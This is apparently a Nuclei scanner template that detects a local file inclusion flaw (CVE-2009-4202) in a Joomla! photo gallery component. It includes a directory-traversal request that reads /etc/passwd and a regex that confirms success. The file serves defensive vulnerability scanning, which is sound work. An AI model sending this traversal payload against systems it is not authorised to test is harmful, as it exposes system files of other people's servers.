nuclei-templates/http/cves/2009/CVE-2009-4202.yaml

45 lines
1.5 KiB
YAML

id: CVE-2009-4202
info:
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
remediation: |
Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/8870
- http://www.vupen.com/english/advisories/2009/1494
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
- http://www.exploit-db.com/exploits/8870
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-4202
cwe-id: CWE-22
epss-score: 0.01956
epss-percentile: 0.87399
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla\!
tags: cve2009,joomla,lfi,photo,edb,cve
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a004830460221008458b2fc16060a09aa3293e8ae20feab79f086a0a253f2d730f4c19ff26e78fa022100c7f6e0833bc4581c260de8d8e1c3ce1f5164370897757a469b8668f964adde08:922c64590222798bb761d5b6d8e72950